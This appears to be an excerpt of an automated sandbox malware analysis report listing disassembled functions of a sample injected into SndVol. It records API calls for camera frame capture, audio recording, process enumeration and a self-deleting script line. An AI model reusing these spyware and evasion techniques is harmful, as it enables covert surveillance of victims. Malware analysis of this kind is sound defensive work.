                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 29135137
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 29135140
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                        • String ID: KeepAlive | Disabled
                                                                        • API String ID: 2993684571-305739064
                                                                        • Opcode ID: 28683268fd7dd699edcbfaeac41e4261d3c04db690599a8ae581d13059fb6ad9
                                                                        • Instruction ID: a46253f85bc713fd823fda394b969415adf3dccc0faaf2eb942372ca1f8dddae
                                                                        • Opcode Fuzzy Hash: 28683268fd7dd699edcbfaeac41e4261d3c04db690599a8ae581d13059fb6ad9
                                                                        • Instruction Fuzzy Hash: FFF024B1A003807FFB243773CC0E9AE7FB5BB02318F40190DE88381269D5348A12DBA2
                                                                        Function 2914AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 2914AE83
                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 2914AE91
                                                                        • Sleep.KERNEL32(00002710), ref: 2914AE98
                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 2914AEA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                        • String ID: Alarm triggered
                                                                        • API String ID: 614609389-2816303416
                                                                        • Opcode ID: a25930c1f93608917123c5cfe0a59badded04c192fa8e91301e90397337121b4
                                                                        • Instruction ID: 40aacf3f755a130eba0d379df73a3498d52bf62b12c1bbed70adf9cd2878e0df
                                                                        • Opcode Fuzzy Hash: a25930c1f93608917123c5cfe0a59badded04c192fa8e91301e90397337121b4
                                                                        • Instruction Fuzzy Hash: 7FE0DF26B000A4376A6433BBAD4EC6F3E39EBD3B64382002DF90656048DD040916CAF2
                                                                        Function 2914CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,2914CE7E), ref: 2914CDF3
                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,2914CE7E), ref: 2914CE00
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,2914CE7E), ref: 2914CE0D
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,2914CE7E), ref: 2914CE20
                                                                        Strings
                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 2914CE13
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                        • API String ID: 3024135584-2418719853
                                                                        • Opcode ID: 1ac6fbcbb8fa3f51d448f34868ff67cd464775fc41e6db6d8569997d7ead9b17
                                                                        • Instruction ID: 1dc30ba9cd19f4d2f46d155334005863c27950bcf2a046f14003859b7fc0919a
                                                                        • Opcode Fuzzy Hash: 1ac6fbcbb8fa3f51d448f34868ff67cd464775fc41e6db6d8569997d7ead9b17
                                                                        • Instruction Fuzzy Hash: 21E04F6260824CBBF3103BB7EC8DCAF7B7CFB85B32B400255FA1781186AA34584196F1
                                                                        Function 291713EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03e0e1941a1d055f8d5bb744841e6e4f893bd3b683594f36b17773eac081a4aa
                                                                        • Instruction ID: 48626abb86fa5ae0bfc18a235d57ba3523ddec4669e1f48a5962aab862306691
                                                                        • Opcode Fuzzy Hash: 03e0e1941a1d055f8d5bb744841e6e4f893bd3b683594f36b17773eac081a4aa
                                                                        • Instruction Fuzzy Hash: 2471D531D013579BCB198F96C884AEFBB75EF42768F944229F91167185D7B08B43CBA0
                                                                        Function 29134371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,2913D29D), ref: 291344C4
                                                                          • Part of subcall function 29134607: __EH_prolog.LIBCMT ref: 2913460C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prologSleep
                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                        • API String ID: 3469354165-3547787478
                                                                        • Opcode ID: ed5b155f0d2c3adaf3a29566ee456105e7a3ff206ba4fbc1198de229a0427e8b
                                                                        • Instruction ID: c76cc097cd2a690facdb307b05282d60a228427941b78ad8c490290488b92c9a
                                                                        • Opcode Fuzzy Hash: ed5b155f0d2c3adaf3a29566ee456105e7a3ff206ba4fbc1198de229a0427e8b
                                                                        • Instruction Fuzzy Hash: 5751E231F0424077D759AB379C05A5D3BB6ABA5248FC09828E80957AD4DF249F0BC39A
                                                                        Function 29174D7C Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • _free.LIBCMT ref: 29174E87
                                                                        • _free.LIBCMT ref: 29174E9E
                                                                        • _free.LIBCMT ref: 29174EBD
                                                                        • _free.LIBCMT ref: 29174ED8
                                                                        • _free.LIBCMT ref: 29174EEF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1835388192-0
                                                                        • Opcode ID: 3d0f34dd53510f006e71da9f5086b28327a576b94d43b34223ea4359624b378b
                                                                        • Instruction ID: dfa75ee607ffa0438bacf223d29679e1fe38066df90732e02b3bb5373836736c
                                                                        • Opcode Fuzzy Hash: 3d0f34dd53510f006e71da9f5086b28327a576b94d43b34223ea4359624b378b
                                                                        • Instruction Fuzzy Hash: 7551B271E00706AFD714DF2ACD42AEA77F5EF54328B114569E909D7690EB35EB02CB80
                                                                        Function 2913F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 2913F956
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 2913F97A
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913F989
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2913FB40
                                                                          • Part of subcall function 2914C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,2913F634,00000000,?,?,291A5338), ref: 2914C08B
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913FB31
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 4269425633-0
                                                                        • Opcode ID: 1e33c2c679dd070d82e6d94378b948d32dc8f8ef43bb2b24aee4d2696cd36caa
                                                                        • Instruction ID: a217d807a6049bee57632462a5e29a868cdbdd104d1d2bb359c35c658b8f9d79
                                                                        • Opcode Fuzzy Hash: 1e33c2c679dd070d82e6d94378b948d32dc8f8ef43bb2b24aee4d2696cd36caa
                                                                        • Instruction Fuzzy Hash: 344116315042446BD3A9E723DC50AEFB7B9AFA4308F90992DD45E82194EF346B0FC756
                                                                        Function 29173E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: aafc9addffebc021bd0c5a51e2926e398c0b0a72806720847fb103177b69969d
                                                                        • Instruction ID: 1bb12b7f1dc419eae62247b01cb7e5677c5530c43528b74b81afc3f21a38a937
                                                                        • Opcode Fuzzy Hash: aafc9addffebc021bd0c5a51e2926e398c0b0a72806720847fb103177b69969d
                                                                        • Instruction Fuzzy Hash: 7A410636E40305AFD714CF79CC85A89B7B5EF88358B1185A9E515EB381DB31AA03CB81
                                                                        Function 0445B5D7 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 242264518-0
                                                                        • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                        • Instruction ID: 25945dd218f04a2619cb2395b89a85d08b5ed9e892bd26b9c7e494eff44cabbd
                                                                        • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                        • Instruction Fuzzy Hash: CF31A27180424ABFEF11AFA5CC448AF3B68EF04369B10415AFD11962A2DB31FD51DB62
                                                                        Function 291811AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,2915DD92,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92), ref: 291811F9
                                                                        • __alloca_probe_16.LIBCMT ref: 29181231
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,2915DD92,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92,?), ref: 29181282
                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92,?,00000002,00000000), ref: 29181294
                                                                        • __freea.LIBCMT ref: 2918129D
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                        • String ID:
                                                                        • API String ID: 1857427562-0
                                                                        • Opcode ID: 912a8074eb76231132fd63e2c0bdc909aa1bd47a7d7cf30e66a5a88f5fef321d
                                                                        • Instruction ID: b6fffaad0e66cdf57e06a7314af887f35926d3fe933376e8af79799cb1f4728c
                                                                        • Opcode Fuzzy Hash: 912a8074eb76231132fd63e2c0bdc909aa1bd47a7d7cf30e66a5a88f5fef321d
                                                                        • Instruction Fuzzy Hash: DE31D272E0020AABEF188F66CC44DEE7BA6FF40758F104168FC04D6190E735DA62DB90
                                                                        Function 29131BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 29131BF9
                                                                        • waveInOpen.WINMM(291A2AC0,000000FF,291A2AA8,Function_00001D0B,00000000,00000000,00000024), ref: 29131C8F
                                                                        • waveInPrepareHeader.WINMM(291A2A88,00000020), ref: 29131CE3
                                                                        • waveInAddBuffer.WINMM(291A2A88,00000020), ref: 29131CF2
                                                                        • waveInStart.WINMM ref: 29131CFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                        • String ID:
                                                                        • API String ID: 1356121797-0
                                                                        • Opcode ID: 2e7a7053cf5c61a69f02ef0892afc8ef6e9c339fec9b4177be093f619aa179e8
                                                                        • Instruction ID: 742b8a6b64c0bb7a18c102fe913f3e4b0689d675653080c7b17a0cb970771641
                                                                        • Opcode Fuzzy Hash: 2e7a7053cf5c61a69f02ef0892afc8ef6e9c339fec9b4177be093f619aa179e8
                                                                        • Instruction Fuzzy Hash: 97217F31704288AFD72DFF67E8485297BBBBBA4314B205C29A005D7E98D73C4D02CB18
                                                                        Function 2917F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 2917F3E3
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2917F406
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2917F42C
                                                                        • _free.LIBCMT ref: 2917F43F
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2917F44E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 2278895681-0
                                                                        • Opcode ID: b5afe4f4b2e35fbc5c10aa2b49a5a790e3c4afda1876a19030fed466462d1260
                                                                        • Instruction ID: 5a772cadb2fc53d56a0ea4e3f8876ba85c8c25ad3c20ae49387a9dc9a2c37716
                                                                        • Opcode Fuzzy Hash: b5afe4f4b2e35fbc5c10aa2b49a5a790e3c4afda1876a19030fed466462d1260
                                                                        • Instruction Fuzzy Hash: 4A019E72B023567B231216B79C8CCFB2A7CEEC6AA83514179BE05D2300DB648E0391B1
                                                                        Function 2914C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 2914C4DE
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914C4EA
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 2914C4FB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914C508
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 1852769593-0
                                                                        • Opcode ID: 839426a2c113d6e5f283527ef16157fd2e0944c8cdb33a65c47873d9153f1d08
                                                                        • Instruction ID: e2f6a2b54ae6cbeb5078c5c585d430d57bb019b50ba8b91b46887316a7f05532
                                                                        • Opcode Fuzzy Hash: 839426a2c113d6e5f283527ef16157fd2e0944c8cdb33a65c47873d9153f1d08
                                                                        • Instruction Fuzzy Hash: F011E5B1B041157FE6055A36EE8DEFB739CEB4A368F00962AF911D61C0D6258E0286B0
                                                                        Function 2914119E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 291411AB
                                                                        • int.LIBCPMT ref: 291411BE
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 2913E10D
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 2913E127
                                                                        • std::_Facet_Register.LIBCPMT ref: 291411FE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 29141207
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 29141225
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                        • String ID:
                                                                        • API String ID: 2536120697-0
                                                                        • Opcode ID: c723fe7322f0136205be4274ea211582f8087e1b18aa1cbb7504a9240be0d0bb
                                                                        • Instruction ID: 6999fcc9de92cebcf312065a2a1a22b013eefe72c2136dc09c4e236b6cc2c055
                                                                        • Opcode Fuzzy Hash: c723fe7322f0136205be4274ea211582f8087e1b18aa1cbb7504a9240be0d0bb
                                                                        • Instruction Fuzzy Hash: B2110632E00218B7CB04DBAADC40CDD7B79AF64668B21955AE905F72A0DB309F13CBD0
                                                                        Function 0445B0F7 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0445B113
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0445B12C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Value___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 1426506684-0
                                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                        • Instruction ID: e9b7f551ec90be59728581ff91109ad2994aa555136c97043234f6170cd4ca9f
                                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                        • Instruction Fuzzy Hash: 1A01D872209791AEBF643A7D6C94A672748FB016FAB20023FEE18429FBEE1178815144
                                                                        Function 29178319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,00000000,2916BCD6,00000000,00000000,?,2916BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2917831E
                                                                        • _free.LIBCMT ref: 29178353
                                                                        • _free.LIBCMT ref: 2917837A
                                                                        • SetLastError.KERNEL32(00000000,?,29135103), ref: 29178387
                                                                        • SetLastError.KERNEL32(00000000,?,29135103), ref: 29178390
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 2ac1df89e57a073b5251ffcc93ebe45e95cb68a48a8eb7d3974a94be20ddf5d7
                                                                        • Instruction ID: ec47f4ce6f577d36507428f4392bb210c0d43604b2e5c8cd794d16cde38f8938
                                                                        • Opcode Fuzzy Hash: 2ac1df89e57a073b5251ffcc93ebe45e95cb68a48a8eb7d3974a94be20ddf5d7
                                                                        • Instruction Fuzzy Hash: 9D01F9367407433A9306663B9CC5DFA227EABE23FC7364665F91492141EB38CB078130
                                                                        Function 29180A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 29180A54
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29180A66
                                                                        • _free.LIBCMT ref: 29180A78
                                                                        • _free.LIBCMT ref: 29180A8A
                                                                        • _free.LIBCMT ref: 29180A9C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 234d2adb558dea289e65a02932f19f3b0b41adaa6e358b51310be8a89e833622
                                                                        • Instruction ID: de7f684bdab8acafe78bc25312c831e1f059757fd50a694e42681fa2d815481b
                                                                        • Opcode Fuzzy Hash: 234d2adb558dea289e65a02932f19f3b0b41adaa6e358b51310be8a89e833622
                                                                        • Instruction Fuzzy Hash: 62F06271A043087B9744EA6FE881CE633EABF30798760DD05F14AD7540C734FE828A50
                                                                        Function 04471759 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                        • Instruction ID: 76018217d9c331aa4ca6f98ae741673b8516bd31a9474e7731623f3ed04252ed
                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                        • Instruction Fuzzy Hash: 08F012325052006BDE20EB69E8C5C5773EEEA047597A45C5BF249DBF50C730F9C18A54
                                                                        Function 291740E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 29174106
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29174118
                                                                        • _free.LIBCMT ref: 2917412B
                                                                        • _free.LIBCMT ref: 2917413C
                                                                        • _free.LIBCMT ref: 2917414D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 6a33f3f3f65f824aaa0f0fcd01c7a52d52ec6c6c4d40663efff3bffae770313b
                                                                        • Instruction ID: 23579ec25ebed4df146bd46d95f7498dd949e3b2452769c82efb6fd7b5d958a4
                                                                        • Opcode Fuzzy Hash: 6a33f3f3f65f824aaa0f0fcd01c7a52d52ec6c6c4d40663efff3bffae770313b
                                                                        • Instruction Fuzzy Hash: 9AF09076A003599F8729BF17BC428843B73A7147A83709806F41462A68C7384E43CFC2
                                                                        Function 04464E05 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                        • Instruction ID: a63b17a2c031a082e2afc13284509dbbba065418170d6e88b90bd376df20ce90
                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                        • Instruction Fuzzy Hash: E4F03AB18025208FEF31AF29BD004063B62A7046A9305056BF50D67EB5C77456C2DFCF
                                                                        Function 044298D2 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 328COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: LfF$xdF$NG
                                                                        • API String ID: 3732870572-2534066922
                                                                        • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
